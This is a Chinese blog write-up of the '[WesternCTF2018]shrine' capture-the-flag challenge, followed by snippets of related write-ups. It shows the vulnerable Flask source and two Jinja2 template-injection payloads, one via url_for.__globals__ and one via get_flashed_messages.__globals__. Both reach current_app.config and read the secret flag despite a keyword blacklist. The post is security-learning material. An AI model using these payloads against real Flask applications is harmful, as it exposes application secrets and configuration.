[WesternCTF2018]shrine 1

最新推荐文章于 2024-08-05 10:52:38 发布
最新推荐文章于 2024-08-05 10:52:38 发布
阅读量2k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124050851
版权

[WesternCTF2018]shrine 1

首先打开题目得到:

在这里插入图片描述是python的flash框架

得到源码:

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG') 
@app.route('/') 
def index(): 
	return open(__file__).read() 


@app.route('/shrine/') 
def shrine(shrine): 

	def safe_jinja(s): s = s.replace('(', '').replace(')', '') 
	blacklist = ['config', 'self'] return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 
	return flask.render_template_string(safe_jinja(shrine)) 

if __name__ == '__main__': app.run(debug=True)

看源码app.config[‘FLAG’] = os.environ.pop(‘FLAG’)

推测{undefined{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号

不过python还有一些内置函数,比如url_for和get_flashed_messages

一、url_for

在这里插入图片描述
current_app意思应该是当前app,那我们就当前app下的config:

playload:

{{url_for.__globals__['current_app'].config}}

在这里插入图片描述

二、get_flashed_message

与上面相同:

playload:

{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述
参考博客:
https://blog.csdn.net/qq_42812036/article/details/104324923

南冥~
关注
[WesternCTF2018]shrine 1(flask)
weixin_45577185的博客
09-10 301
非常完美的答案 分析源码 app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 上面这行代码把黑名单的东西遍历并设为空,例如:
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2499
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
[WesternCTF2018]shrine1
最新发布
kw741951的博客
08-05 294
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。存在flask-jinja2模板注入,并且存在黑名单过滤。发现了current_app()函数。查看其中的config得到flag。输入shrine/{{7*7}}打开题目,没什么头绪。查看页面源代码看一下。
flask之ssti [WesternCTF2018]shrine1
m0_75178803的博客
03-18 1087
打开题目。
模板注入 [WesternCTF2018]shrine1
m0_75178803的博客
02-23 447
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。输入shrine/{{7*7}}验证成功。存在flask-jinja2模板注入,发现了current_app()函数。查看这个里面的config。
[WesternCTF2018] web题-shrine
BROTHERYY的博客
12-30 287
开题即送源码一份 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径 def shrine(shrine): def safe_j
BUUCTF web(九)
m0_46616663的博客
08-29 1239
BUUCTF刷题笔记
CTF—Python考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4088
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
[WesternCTF2018]shrine
夜幕下的灯火阑珊的博客
05-11 210
知识点 Jinja2 url_for 参考 https://www.cnblogs.com/Cl0ud/p/12316287.html https://www.cnblogs.com/wangtanzhi/p/12238779.html
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 277
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
WesternCTF2018_shrine
抒情诗
05-08 475
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923 0x00 开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码: import flask import os app = flask.Fla...
CTF SSTI 一些记录
3569
10-13 5884
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
【学习笔记18】buu [WesternCTF2018]shrine
weixin_43553654的博客
05-18 470
打开网站,查看源码看到下面的一串代码 import flask//flask模板,首先就想到了想到了之前我写的一篇flask模板ssti逃逸 import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG')//注册了一个名为FLAG的config,这里基本可以确定是flag。 @app.route('...
PyPI 官网发布的 shrine-0.0.18 Python库压缩包下载
1. PyPI 网站介绍: PyPI(Python Package Index)是 Python 编程语言的官方软件包仓库,由 Python 软件基金会维护。该网站为 Python 开发者提供了一个集中的地方去搜索、安装和分发第三方库。开发者可以将他们的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值